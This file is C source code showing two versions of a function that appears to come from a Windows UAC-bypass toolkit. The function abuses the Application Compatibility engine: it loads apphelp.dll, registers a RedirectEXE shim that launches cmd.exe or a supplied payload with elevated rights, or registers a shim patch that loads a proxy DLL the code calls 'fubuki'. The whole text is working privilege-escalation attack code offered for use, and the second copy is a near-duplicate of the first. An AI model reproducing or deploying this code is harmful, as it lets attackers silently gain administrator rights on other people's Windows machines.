/* * ucmAppcompatElevation * * Purpose: * * AutoElevation using Application Compatibility engine. * */ BOOL ucmAppcompatElevation( UACBYPASSMETHOD Method, CONST PVOID ProxyDll, DWORD ProxyDllSize, LPWSTR lpszPayloadEXE ) { BOOL cond = FALSE, bResult = FALSE; WCHAR szBuffer[MAX_PATH * 2]; do { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\apphelp.dll"), szBuffer, MAX_PATH) == 0) { break; } hAppHelp = LoadLibrary(szBuffer); if (hAppHelp == NULL) { break; } if (ucmInitAppHelp() == FALSE) { break; } //create and register shim with RedirectEXE, cmd.exe as payload if (Method == UacMethodRedirectExe) { if (lpszPayloadEXE == NULL) { _strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe"); bResult = ucmShimRedirectEXE(szBuffer); } else { bResult = ucmShimRedirectEXE(lpszPayloadEXE); } return bResult; } //create and register shim patch with fubuki as payload if (Method == UacMethodShimPatch) { bResult = ucmShimPatch(ProxyDll, ProxyDllSize); } } while (cond); return bResult; }
/* * ucmAppcompatElevation * * Purpose: * * AutoElevation using Application Compatibility engine. * */ BOOL ucmAppcompatElevation( UACBYPASSMETHOD Method, CONST PVOID ProxyDll, DWORD ProxyDllSize, LPWSTR lpszPayloadEXE ) { BOOL cond = FALSE, bResult = FALSE; WCHAR szBuffer[MAX_PATH * 2]; do { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, g_ctx.szSystemDirectory); _strcat(szBuffer, APPHELP_DLL); hAppHelp = LoadLibrary(szBuffer); if (hAppHelp == NULL) { break; } if (ucmInitAppHelp() == FALSE) { break; } //create and register shim with RedirectEXE, cmd.exe as payload if (Method == UacMethodRedirectExe) { if (lpszPayloadEXE == NULL) { _strcpy_w(szBuffer, T_DEFAULT_CMD); bResult = ucmShimRedirectEXE(szBuffer); } else { bResult = ucmShimRedirectEXE(lpszPayloadEXE); } return bResult; } //create and register shim patch with fubuki as payload if (Method == UacMethodShimPatch) { bResult = ucmShimPatch(ProxyDll, ProxyDllSize); } } while (cond); return bResult; }